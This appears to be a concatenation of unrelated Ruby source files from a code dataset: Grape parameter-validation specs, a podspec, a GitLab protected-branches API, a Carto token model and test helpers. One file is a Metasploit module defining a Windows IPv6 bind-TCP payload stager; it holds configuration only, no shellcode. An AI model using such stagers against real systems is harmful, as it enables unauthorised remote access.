expect(last_response.body).to eq('items[0][optional_subitems][0][value] is missing')
end
it 'adds to declared parameters' do
subject.params do
optional :items, type: Array do
requires :key
optional(:optional_subitems, type: Array) { requires :value }
requires(:required_subitems, type: Array) { requires :value }
end
end
expect(declared_params).to eq([items: [:key, { optional_subitems: [:value] }, { required_subitems: [:value] }]])
end
context <<~DESC do
Issue occurs whenever:
* param structure with at least three levels
* 1st level item is a required Array that has >1 entry with an optional item present and >1 entry with an optional item missing#{' '}
* 2nd level is an optional Array or Hash#{' '}
* 3rd level is a required item (can be any type)
* additional levels do not affect whether the issue occurs
DESC
it 'example based on an actual real-world use case' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Array do
requires :batches, type: Array do
requires :batch_no, type: String
end
end
end
end
subject.get '/validate_required_arrays_under_optional_arrays' do
'validate_required_arrays_under_optional_arrays works!'
end
data = {
orders: [
{ id: 77, drugs: [{ batches: [{ batch_no: 'A1234567' }] }] },
{ id: 70 }
]
}
get '/validate_required_arrays_under_optional_arrays', data
expect(last_response.body).to eq('validate_required_arrays_under_optional_arrays works!')
expect(last_response.status).to eq(200)
end
it 'simplest example using Array -> Array -> Hash -> String' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Array do
requires :batch_no, type: String
end
end
end
subject.get '/validate_required_arrays_under_optional_arrays' do
'validate_required_arrays_under_optional_arrays works!'
end
data = {
orders: [
{ id: 77, drugs: [{ batch_no: 'A1234567' }] },
{ id: 70 }
]
}
get '/validate_required_arrays_under_optional_arrays', data
expect(last_response.body).to eq('validate_required_arrays_under_optional_arrays works!')
expect(last_response.status).to eq(200)
end
it 'simplest example using Array -> Hash -> String' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Hash do
requires :batch_no, type: String
end
end
end
subject.get '/validate_required_arrays_under_optional_arrays' do
'validate_required_arrays_under_optional_arrays works!'
end
data = {
orders: [
{ id: 77, drugs: { batch_no: 'A1234567' } },
{ id: 70 }
]
}
get '/validate_required_arrays_under_optional_arrays', data
expect(last_response.body).to eq('validate_required_arrays_under_optional_arrays works!')
expect(last_response.status).to eq(200)
end
it 'correctly indexes invalid data' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Array do
requires :batch_no, type: String
requires :quantity, type: Integer
end
end
end
subject.get '/correctly_indexes' do
'correctly_indexes works!'
end
data = {
orders: [
{ id: 70 },
{ id: 77, drugs: [{ batch_no: 'A1234567', quantity: 12 }, { batch_no: 'B222222' }] }
]
}
get '/correctly_indexes', data
expect(last_response.body).to eq('orders[1][drugs][1][quantity] is missing')
expect(last_response.status).to eq(400)
end
context 'multiple levels of optional and requires settings' do
before do
subject.params do
requires :top, type: Array do
requires :top_id, type: Integer, allow_blank: false
optional :middle_1, type: Array do
requires :middle_1_id, type: Integer, allow_blank: false
optional :middle_2, type: Array do
requires :middle_2_id, type: String, allow_blank: false
optional :bottom, type: Array do
requires :bottom_id, type: Integer, allow_blank: false
end
end
end
end
end
subject.get '/multi_level' do
'multi_level works!'
end
end
it 'with valid data' do
data = {
top: [
{ top_id: 1, middle_1: [
{ middle_1_id: 11 }, { middle_1_id: 12, middle_2: [
{ middle_2_id: 121 }, { middle_2_id: 122, bottom: [{ bottom_id: 1221 }] }
] }
] },
{ top_id: 2, middle_1: [
{ middle_1_id: 21 }, { middle_1_id: 22, middle_2: [
{ middle_2_id: 221 }
] }
] },
{ top_id: 3, middle_1: [
{ middle_1_id: 31 }, { middle_1_id: 32 }
] },
{ top_id: 4 }
]
}
get '/multi_level', data
expect(last_response.body).to eq('multi_level works!')
expect(last_response.status).to eq(200)
end
it 'with invalid data' do
data = {
top: [
{ top_id: 1, middle_1: [
{ middle_1_id: 11 }, { middle_1_id: 12, middle_2: [
{ middle_2_id: 121 }, { middle_2_id: 122, bottom: [{ bottom_id: nil }] }
] }
] },
{ top_id: 2, middle_1: [
{ middle_1_id: 21 }, { middle_1_id: 22, middle_2: [{ middle_2_id: nil }] }
] },
{ top_id: 3, middle_1: [
{ middle_1_id: nil }, { middle_1_id: 32 }
] },
{ top_id: nil, missing_top_id: 4 }
]
}
get '/multi_level', data
expect(last_response.body.split(', ')).to match_array([
'top[3][top_id] is empty',
'top[2][middle_1][0][middle_1_id] is empty',
'top[1][middle_1][1][middle_2][0][middle_2_id] is empty',
'top[0][middle_1][1][middle_2][1][bottom][0][bottom_id] is empty'
])
expect(last_response.status).to eq(400)
end
end
end
it 'exactly_one_of' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Hash do
optional :batch_no, type: String
optional :batch_id, type: String
exactly_one_of :batch_no, :batch_id
end
end
end
subject.get '/exactly_one_of' do
'exactly_one_of works!'
end
data = {
orders: [
{ id: 77, drugs: { batch_no: 'A1234567' } },
{ id: 70 }
]
}
get '/exactly_one_of', data
expect(last_response.body).to eq('exactly_one_of works!')
expect(last_response.status).to eq(200)
end
it 'at_least_one_of' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Hash do
optional :batch_no, type: String
optional :batch_id, type: String
at_least_one_of :batch_no, :batch_id
end
end
end
subject.get '/at_least_one_of' do
'at_least_one_of works!'
end
data = {
orders: [
{ id: 77, drugs: { batch_no: 'A1234567' } },
{ id: 70 }
]
}
get '/at_least_one_of', data
expect(last_response.body).to eq('at_least_one_of works!')
expect(last_response.status).to eq(200)
end
it 'all_or_none_of' do
subject.params do
requires :orders, type: Array do
requires :id, type: Integer
optional :drugs, type: Hash do
optional :batch_no, type: String
optional :batch_id, type: String
all_or_none_of :batch_no, :batch_id
end
end
end
subject.get '/all_or_none_of' do
'all_or_none_of works!'
end
data = {
orders: [
{ id: 77, drugs: { batch_no: 'A1234567', batch_id: '12' } },
{ id: 70 }
]
}
get '/all_or_none_of', data
expect(last_response.body).to eq('all_or_none_of works!')
expect(last_response.status).to eq(200)
end
end
context 'multiple validation errors' do
before do
subject.params do
requires :yolo
requires :swag
end
subject.get '/two_required' do
'two required works'
end
end
it 'throws the validation errors' do
get '/two_required'
expect(last_response.status).to eq(400)
expect(last_response.body).to match(/yolo is missing/)
expect(last_response.body).to match(/swag is missing/)
end
end
context 'custom validation' do
let(:custom_validator) do
Class.new(Grape::Validations::Validators::Base) do
def validate_param!(attr_name, params)
return if params[attr_name] == 'im custom'
raise Grape::Exceptions::Validation.new(params: [@scope.full_name(attr_name)], message: 'is not custom!')
end
end
end
before do
described_class.register_validator('customvalidator', custom_validator)
end
after do
described_class.deregister_validator('customvalidator')
end
context 'when using optional with a custom validator' do
before do
subject.params do
optional :custom, customvalidator: true
end
subject.get '/optional_custom' do
'optional with custom works!'
end
end
it 'validates when param is present' do
get '/optional_custom', custom: 'im custom'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with custom works!')
get '/optional_custom', custom: 'im wrong'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
end
it "skips validation when parameter isn't present" do
get '/optional_custom'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with custom works!')
end
it 'validates with custom validator when param present and incorrect type' do
subject.params do
optional :custom, type: String, customvalidator: true
end
get '/optional_custom', custom: 123
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
end
end
context 'when using requires with a custom validator' do
before do
subject.params do
requires :custom, customvalidator: true
end
subject.get '/required_custom' do
'required with custom works!'
end
end
it 'validates when param is present' do
get '/required_custom', custom: 'im wrong, validate me'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
get '/required_custom', custom: 'im custom'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required with custom works!')
end
it 'validates when param is not present' do
get '/required_custom'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is missing, custom is not custom!')
end
context 'nested namespaces' do
before do
subject.params do
requires :custom, customvalidator: true
end
subject.namespace 'nested' do
get 'one' do
'validation failed'
end
namespace 'nested' do
get 'two' do
'validation failed'
end
end
end
subject.namespace 'peer' do
get 'one' do
'no validation required'
end
namespace 'nested' do
get 'two' do
'no validation required'
end
end
end
subject.namespace 'unrelated' do
params do
requires :name
end
get 'one' do
'validation required'
end
namespace 'double' do
get 'two' do
'no validation required'
end
end
end
end
specify 'the parent namespace uses the validator' do
get '/nested/one', custom: 'im wrong, validate me'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
end
specify 'the nested namespace inherits the custom validator' do
get '/nested/nested/two', custom: 'im wrong, validate me'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
end
      specify 'peer namespaces do not have the validator' do
get '/peer/one', custom: 'im not validated'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('no validation required')
end
specify 'namespaces nested in peers should also not have the validator' do
get '/peer/nested/two', custom: 'im not validated'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('no validation required')
end
specify 'when nested, specifying a route should clear out the validations for deeper nested params' do
get '/unrelated/one'
expect(last_response.status).to eq(400)
get '/unrelated/double/two'
expect(last_response.status).to eq(200)
end
end
end
context 'when using options on param' do
let(:custom_validator_with_options) do
Class.new(Grape::Validations::Validators::Base) do
def validate_param!(attr_name, params)
return if params[attr_name] == @option[:text]
raise Grape::Exceptions::Validation.new(params: [@scope.full_name(attr_name)], message: message)
end
end
end
before do
described_class.register_validator('customvalidator_with_options', custom_validator_with_options)
end
after do
described_class.deregister_validator('customvalidator_with_options')
end
before do
subject.params do
optional :custom, customvalidator_with_options: { text: 'im custom with options', message: 'is not custom with options!' }
end
subject.get '/optional_custom' do
'optional with custom works!'
end
end
it 'validates param with custom validator with options' do
get '/optional_custom', custom: 'im custom with options'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with custom works!')
get '/optional_custom', custom: 'im wrong'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom with options!')
end
end
end
context 'named' do
context 'can be defined' do
it 'in helpers' do
subject.helpers do
params :pagination do
end
end
end
      it 'in a helper module which is a kind of Grape::DSL::Helpers::BaseHelper' do
shared_params = Module.new do
extend Grape::DSL::Helpers::BaseHelper
params :pagination do
end
end
subject.helpers shared_params
end
end
context 'can be included in usual params' do
before do
shared_params = Module.new do
extend Grape::DSL::Helpers::BaseHelper
params :period do
optional :start_date
optional :end_date
end
end
subject.helpers shared_params
subject.helpers do
params :pagination do
optional :page, type: Integer
optional :per_page, type: Integer
end
end
end
it 'by #use' do
subject.params do
use :pagination
end
expect(declared_params).to eq %i[page per_page]
end
it 'by #use with multiple params' do
subject.params do
use :pagination, :period
end
expect(declared_params).to eq %i[page per_page start_date end_date]
end
end
context 'with block' do
before do
subject.helpers do
params :order do |options|
optional :order, type: Symbol, values: %i[asc desc], default: options[:default_order]
optional :order_by, type: Symbol, values: options[:order_by], default: options[:default_order_by]
end
end
subject.format :json
subject.params do
use :order, default_order: :asc, order_by: %i[name created_at], default_order_by: :created_at
end
subject.get '/order' do
{
order: params[:order],
order_by: params[:order_by]
}
end
end
it 'returns defaults' do
get '/order'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq({ order: :asc, order_by: :created_at }.to_json)
end
it 'overrides default value for order' do
get '/order?order=desc'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq({ order: :desc, order_by: :created_at }.to_json)
end
it 'overrides default value for order_by' do
get '/order?order_by=name'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq({ order: :asc, order_by: :name }.to_json)
end
it 'fails with invalid value' do
get '/order?order=invalid'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('{"error":"order does not have a valid value"}')
end
end
end
context 'documentation' do
it 'can be included with a hash' do
documentation = { example: 'Joe' }
subject.params do
requires 'first_name', documentation: documentation
end
subject.get '/' do
end
expect(subject.routes.first.params['first_name'][:documentation]).to eq(documentation)
end
end
context 'all or none' do
context 'optional params' do
before do
subject.resource :custom_message do
params do
optional :beer
optional :wine
optional :juice
all_or_none_of :beer, :wine, :juice, message: 'all params are required or none is required'
end
get '/all_or_none' do
'all_or_none works!'
end
end
end
context 'with a custom validation message' do
it 'errors when any one is present' do
get '/custom_message/all_or_none', beer: 'string'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice all params are required or none is required'
end
it 'works when all params are present' do
get '/custom_message/all_or_none', beer: 'string', wine: 'anotherstring', juice: 'anotheranotherstring'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'all_or_none works!'
end
it 'works when none are present' do
get '/custom_message/all_or_none'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'all_or_none works!'
end
end
end
end
context 'mutually exclusive' do
context 'optional params' do
context 'with custom validation message' do
it 'errors when two or more are present' do
subject.resources :custom_message do
params do
optional :beer
optional :wine
optional :juice
mutually_exclusive :beer, :wine, :juice, message: 'are mutually exclusive cannot pass both params'
end
get '/mutually_exclusive' do
'mutually_exclusive works!'
end
end
get '/custom_message/mutually_exclusive', beer: 'string', wine: 'anotherstring'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are mutually exclusive cannot pass both params'
end
end
it 'errors when two or more are present' do
subject.params do
optional :beer
optional :wine
optional :juice
mutually_exclusive :beer, :wine, :juice
end
subject.get '/mutually_exclusive' do
'mutually_exclusive works!'
end
get '/mutually_exclusive', beer: 'string', wine: 'anotherstring'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are mutually exclusive'
end
end
context 'more than one set of mutually exclusive params' do
context 'with a custom validation message' do
it 'errors for all sets' do
subject.resources :custom_message do
params do
optional :beer
optional :wine
mutually_exclusive :beer, :wine, message: 'are mutually exclusive pass only one'
optional :nested, type: Hash do
optional :scotch
optional :aquavit
mutually_exclusive :scotch, :aquavit, message: 'are mutually exclusive pass only one'
end
optional :nested2, type: Array do
optional :scotch2
optional :aquavit2
mutually_exclusive :scotch2, :aquavit2, message: 'are mutually exclusive pass only one'
end
end
get '/mutually_exclusive' do
'mutually_exclusive works!'
end
end
get '/custom_message/mutually_exclusive', beer: 'true', wine: 'true', nested: { scotch: 'true', aquavit: 'true' }, nested2: [{ scotch2: 'true' }, { scotch2: 'true', aquavit2: 'true' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq(
'beer, wine are mutually exclusive pass only one, nested[scotch], nested[aquavit] are mutually exclusive pass only one, nested2[1][scotch2], nested2[1][aquavit2] are mutually exclusive pass only one'
)
end
end
it 'errors for all sets' do
subject.params do
optional :beer
optional :wine
mutually_exclusive :beer, :wine
optional :nested, type: Hash do
optional :scotch
optional :aquavit
mutually_exclusive :scotch, :aquavit
end
optional :nested2, type: Array do
optional :scotch2
optional :aquavit2
mutually_exclusive :scotch2, :aquavit2
end
end
subject.get '/mutually_exclusive' do
'mutually_exclusive works!'
end
get '/mutually_exclusive', beer: 'true', wine: 'true', nested: { scotch: 'true', aquavit: 'true' }, nested2: [{ scotch2: 'true' }, { scotch2: 'true', aquavit2: 'true' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are mutually exclusive, nested[scotch], nested[aquavit] are mutually exclusive, nested2[1][scotch2], nested2[1][aquavit2] are mutually exclusive'
end
end
context 'in a group' do
it 'works when only one from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
mutually_exclusive :beer, :wine, :juice
end
end
subject.get '/mutually_exclusive_group' do
'mutually_exclusive_group works!'
end
get '/mutually_exclusive_group', drink: { beer: 'true' }
expect(last_response.status).to eq(200)
end
it 'errors when more than one from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
mutually_exclusive :beer, :wine, :juice
end
end
subject.get '/mutually_exclusive_group' do
'mutually_exclusive_group works!'
end
get '/mutually_exclusive_group', drink: { beer: 'true', juice: 'true', wine: 'true' }
expect(last_response.status).to eq(400)
end
end
context 'mutually exclusive params inside Hash group' do
it 'invalidates if request param is invalid type' do
subject.params do
optional :wine, type: Hash do
optional :grape
optional :country
mutually_exclusive :grape, :country
end
end
subject.post '/mutually_exclusive' do
'mutually_exclusive works!'
end
post '/mutually_exclusive', wine: '2015 sauvignon'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'wine is invalid'
end
end
end
context 'exactly one of' do
context 'params' do
before do
subject.resources :custom_message do
params do
optional :beer
optional :wine
optional :juice
exactly_one_of :beer, :wine, :juice, message: 'are missing, exactly one parameter is required'
end
get '/exactly_one_of' do
'exactly_one_of works!'
end
end
subject.params do
optional :beer
optional :wine
optional :juice
exactly_one_of :beer, :wine, :juice
end
subject.get '/exactly_one_of' do
'exactly_one_of works!'
end
end
context 'with a custom validation message' do
it 'errors when none are present' do
get '/custom_message/exactly_one_of'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice are missing, exactly one parameter is required'
end
it 'succeeds when one is present' do
get '/custom_message/exactly_one_of', beer: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'exactly_one_of works!'
end
it 'errors when two or more are present' do
get '/custom_message/exactly_one_of', beer: 'string', wine: 'anotherstring'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are missing, exactly one parameter is required'
end
end
it 'errors when none are present' do
get '/exactly_one_of'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice are missing, exactly one parameter must be provided'
end
it 'succeeds when one is present' do
get '/exactly_one_of', beer: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'exactly_one_of works!'
end
it 'errors when two or more are present' do
get '/exactly_one_of', beer: 'string', wine: 'anotherstring'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are mutually exclusive'
end
end
context 'nested params' do
before do
subject.params do
requires :nested, type: Hash do
optional :beer_nested
optional :wine_nested
optional :juice_nested
exactly_one_of :beer_nested, :wine_nested, :juice_nested
end
optional :nested2, type: Array do
optional :beer_nested2
optional :wine_nested2
optional :juice_nested2
exactly_one_of :beer_nested2, :wine_nested2, :juice_nested2
end
end
subject.get '/exactly_one_of_nested' do
'exactly_one_of works!'
end
end
it 'errors when none are present' do
get '/exactly_one_of_nested'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'nested is missing, nested[beer_nested], nested[wine_nested], nested[juice_nested] are missing, exactly one parameter must be provided'
end
it 'succeeds when one is present' do
get '/exactly_one_of_nested', nested: { beer_nested: 'string' }
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'exactly_one_of works!'
end
it 'errors when two or more are present' do
get '/exactly_one_of_nested', nested: { beer_nested: 'string' }, nested2: [{ beer_nested2: 'string', wine_nested2: 'anotherstring' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'nested2[0][beer_nested2], nested2[0][wine_nested2] are mutually exclusive'
end
end
end
context 'at least one of' do
context 'params' do
before do
subject.resources :custom_message do
params do
optional :beer
optional :wine
optional :juice
at_least_one_of :beer, :wine, :juice, message: 'are missing, please specify at least one param'
end
get '/at_least_one_of' do
'at_least_one_of works!'
end
end
subject.params do
optional :beer
optional :wine
optional :juice
at_least_one_of :beer, :wine, :juice
end
subject.get '/at_least_one_of' do
'at_least_one_of works!'
end
end
context 'with a custom validation message' do
it 'errors when none are present' do
get '/custom_message/at_least_one_of'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice are missing, please specify at least one param'
end
it 'does not error when one is present' do
get '/custom_message/at_least_one_of', beer: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
it 'does not error when two are present' do
get '/custom_message/at_least_one_of', beer: 'string', wine: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
end
it 'errors when none are present' do
get '/at_least_one_of'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice are missing, at least one parameter must be provided'
end
it 'does not error when one is present' do
get '/at_least_one_of', beer: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
it 'does not error when two are present' do
get '/at_least_one_of', beer: 'string', wine: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
end
context 'nested params' do
before do
subject.params do
requires :nested, type: Hash do
optional :beer
optional :wine
optional :juice
at_least_one_of :beer, :wine, :juice
end
optional :nested2, type: Array do
optional :beer
optional :wine
optional :juice
at_least_one_of :beer, :wine, :juice
end
end
subject.get '/at_least_one_of_nested' do
'at_least_one_of works!'
end
end
it 'errors when none are present' do
get '/at_least_one_of_nested'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'nested is missing, nested[beer], nested[wine], nested[juice] are missing, at least one parameter must be provided'
end
it 'does not error when one is present' do
get '/at_least_one_of_nested', nested: { beer: 'string' }, nested2: [{ beer: 'string' }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
it 'does not error when two are present' do
get '/at_least_one_of_nested', nested: { beer: 'string', wine: 'string' }, nested2: [{ beer: 'string', wine: 'string' }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
end
end
context 'in a group' do
it 'works when only one from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
exactly_one_of :beer, :wine, :juice
end
end
subject.get '/exactly_one_of_group' do
'exactly_one_of_group works!'
end
get '/exactly_one_of_group', drink: { beer: 'true' }
expect(last_response.status).to eq(200)
end
it 'errors when no parameter from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
exactly_one_of :beer, :wine, :juice
end
end
subject.get '/exactly_one_of_group' do
'exactly_one_of_group works!'
end
get '/exactly_one_of_group', drink: {}
expect(last_response.status).to eq(400)
end
it 'errors when more than one from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
exactly_one_of :beer, :wine, :juice
end
end
subject.get '/exactly_one_of_group' do
'exactly_one_of_group works!'
end
get '/exactly_one_of_group', drink: { beer: 'true', juice: 'true', wine: 'true' }
expect(last_response.status).to eq(400)
end
it 'does not falsely think the param is there if it is provided outside the block' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
exactly_one_of :beer, :wine, :juice
end
end
subject.get '/exactly_one_of_group' do
'exactly_one_of_group works!'
end
get '/exactly_one_of_group', drink: { foo: 'bar' }, beer: 'true'
expect(last_response.status).to eq(400)
end
end
end
end
| 33.847903 | 213 | 0.565336 |
79837a40ff50dd982ebdc0c9defc8bcb54ccfe03 | 872 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "react-native-cidscan"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "9.0" }
s.source = { :git => "https://github.com/P4IT/react-native-cidscan.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm,a,swift}"
s.resources = "ios/*.{png}"
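  # Bundle the prebuilt CaptureID static library and expose it as a static framework.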
s.static_framework = true
s.vendored_libraries = 'ios/libCaptureIDLibrary.a'
s.ios.xcconfig = { "HEADER_SEARCH_PATHS" => "$(PODS_ROOT)/#{s.name}, #{File.join(File.dirname(__FILE__), 'ios')}", "LIBRARY_SEARCH_PATHS" => "#{File.join(File.dirname(__FILE__), 'ios')}" }
s.dependency "React-Core"
end
| 34.88 | 190 | 0.619266 |
33dea25289a319d77894d49df0f63ecb2e353d67 | 3,806 | # frozen_string_literal: true
module API
class ProtectedBranches < Grape::API
include PaginationParams
BRANCH_ENDPOINT_REQUIREMENTS = API::NAMESPACE_OR_PROJECT_REQUIREMENTS.merge(name: API::NO_SLASH_URL_PART_REGEX)
before { authorize_admin_project }
helpers Helpers::ProtectedBranchesHelpers
params do
requires :id, type: String, desc: 'The ID of a project'
end
resource :projects, requirements: API::NAMESPACE_OR_PROJECT_REQUIREMENTS do
desc "Get a project's protected branches" do
success Entities::ProtectedBranch
end
params do
use :pagination
end
# rubocop: disable CodeReuse/ActiveRecord
get ':id/protected_branches' do
protected_branches = user_project.protected_branches.preload(:push_access_levels, :merge_access_levels)
present paginate(protected_branches), with: Entities::ProtectedBranch, project: user_project
end
# rubocop: enable CodeReuse/ActiveRecord
desc 'Get a single protected branch' do
success Entities::ProtectedBranch
end
params do
requires :name, type: String, desc: 'The name of the branch or wildcard'
end
# rubocop: disable CodeReuse/ActiveRecord
get ':id/protected_branches/:name', requirements: BRANCH_ENDPOINT_REQUIREMENTS do
protected_branch = user_project.protected_branches.find_by!(name: params[:name])
present protected_branch, with: Entities::ProtectedBranch, project: user_project
end
# rubocop: enable CodeReuse/ActiveRecord
desc 'Protect a single branch or wildcard' do
success Entities::ProtectedBranch
end
params do
requires :name, type: String, desc: 'The name of the protected branch'
optional :push_access_level, type: Integer,
values: ProtectedBranch::PushAccessLevel.allowed_access_levels,
desc: 'Access levels allowed to push (defaults: `40`, maintainer access level)'
optional :merge_access_level, type: Integer,
values: ProtectedBranch::MergeAccessLevel.allowed_access_levels,
desc: 'Access levels allowed to merge (defaults: `40`, maintainer access level)'
use :optional_params_ee
end
# rubocop: disable CodeReuse/ActiveRecord
post ':id/protected_branches' do
protected_branch = user_project.protected_branches.find_by(name: params[:name])
if protected_branch
conflict!("Protected branch '#{params[:name]}' already exists")
end
declared_params = declared_params(include_missing: false)
api_service = ::ProtectedBranches::ApiService.new(user_project, current_user, declared_params)
protected_branch = api_service.create
if protected_branch.persisted?
present protected_branch, with: Entities::ProtectedBranch, project: user_project
else
render_api_error!(protected_branch.errors.full_messages, 422)
end
end
# rubocop: enable CodeReuse/ActiveRecord
desc 'Unprotect a single branch'
params do
requires :name, type: String, desc: 'The name of the protected branch'
end
# rubocop: disable CodeReuse/ActiveRecord
delete ':id/protected_branches/:name', requirements: BRANCH_ENDPOINT_REQUIREMENTS do
protected_branch = user_project.protected_branches.find_by!(name: params[:name])
destroy_conditionally!(protected_branch) do
destroy_service = ::ProtectedBranches::DestroyService.new(user_project, current_user)
destroy_service.execute(protected_branch)
end
end
# rubocop: enable CodeReuse/ActiveRecord
end
end
end
| 40.063158 | 118 | 0.686548 |
1d05fa2b7f863f87399f44ac2d9fcc8362955d71 | 43 | module RubyExample
VERSION = "0.1.0"
end
| 10.75 | 19 | 0.697674 |
e85c09525926d1578a0f8b491ce5895c9b5564be | 1,169 | module Carto
class AccessToken < OauthToken
# Compatibility with ActiveRecord inheritance. When migrating to ActiveRecord,
# the class name changed from ::AccessToken to ::Carto::AccessToken
# Source: https://yiming.dev/blog/2017/12/07/add-sti-to-a-legacy-activerecord-model/
self.store_full_sti_class = false
before_create :set_authorized_at
after_create :store_api_credentials
after_destroy :clear_api_credentials
private
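    # Redis hash key under which this token's API credentials are stored.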
def metadata_key
"rails:oauth_access_tokens:#{token}"
end
def set_authorized_at
self.authorized_at = Time.now
end
def store_api_credentials
$api_credentials.hset metadata_key, "consumer_key", client_application.key
$api_credentials.hset metadata_key, "consumer_secret", client_application.secret
$api_credentials.hset metadata_key, "access_token_token", token
$api_credentials.hset metadata_key, "access_token_secret", secret
$api_credentials.hset metadata_key, "user_id", user_id
$api_credentials.hset metadata_key, "time", authorized_at
end
def clear_api_credentials
$api_credentials.del metadata_key
end
end
end
| 30.763158 | 88 | 0.747648 |
e9933e7acd363f480db729cd2a62796a894e24cb | 845 | # frozen_string_literal: true
require 'rspec'
RSpec.shared_context 'WidgetsCommon' do
before(:all) do
LibyuiClient.timeout = 0
LibyuiClient.interval = 0
@app = LibyuiClient::App.new(host: 'www.example.com', port: '9999')
end
# Common Request/Response parts
let(:widgets_url) { 'http://www.example.com:9999/widgets' }
let(:id) { { id: 'libyui' } }
let(:query_id) { { query: id } }
let(:status404) { { status: 404 } }
let(:disabled_widget) { { body: '[{"enabled": "false"}]' } }
# Common Stubbed Requests
# POST Stubs
let(:stub_post) { stub_request(:post, widgets_url) }
let(:stub_post_404) { stub_post.to_return(status404) }
# GET Stubs
let(:stub_get) { stub_request(:get, widgets_url) }
let(:stub_get_id) { stub_get.with(query_id) }
let(:stub_get_id_404) { stub_get_id.to_return(status404) }
end
| 29.137931 | 71 | 0.671006 |
d596b3f566f61b94096aae5f9b14444c54ca8e1d | 1,008 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/windows/bind_tcp'
module MetasploitModule
CachedSize = 318
include Msf::Payload::Stager
include Msf::Payload::Windows::BindTcp
def self.handler_type_alias
"bind_ipv6_tcp_uuid"
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind IPv6 TCP Stager with UUID Support (Windows x86)',
'Description' => 'Listen for an IPv6 connection with UUID Support (Windows x86)',
'Author' => [ 'hdm', 'skape', 'sf', 'OJ Reeves' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => false }
))
end
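  # Listen for the stage connection on an IPv6 TCP socket.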
def use_ipv6
true
end
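  # Transmit the payload UUID during staging for session identification.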
def include_send_uuid
true
end
end
| 23.44186 | 87 | 0.628968 |
edd016097ed63fe89516aae41cd4a4a7a94b2d87 | 916 | require 'spec_helper'
require 'hiera-puppet-helper'
describe 'rjil::trust_selfsigned_cert' do
let :params do
{
:cert => '/etc/ssl/certs/jiocloud.com.crt',
:ssl_cert_package => 'jiocloud-ssl-certificate',
}
end
let :facts do
{
:operatingsystem => 'Ubuntu',
:osfamily => 'Debian',
      :lsbdistid       => 'ubuntu',
}
end
context 'with defaults' do
it do
should contain_package('ca-certificates')
should contain_package('jiocloud-ssl-certificate')
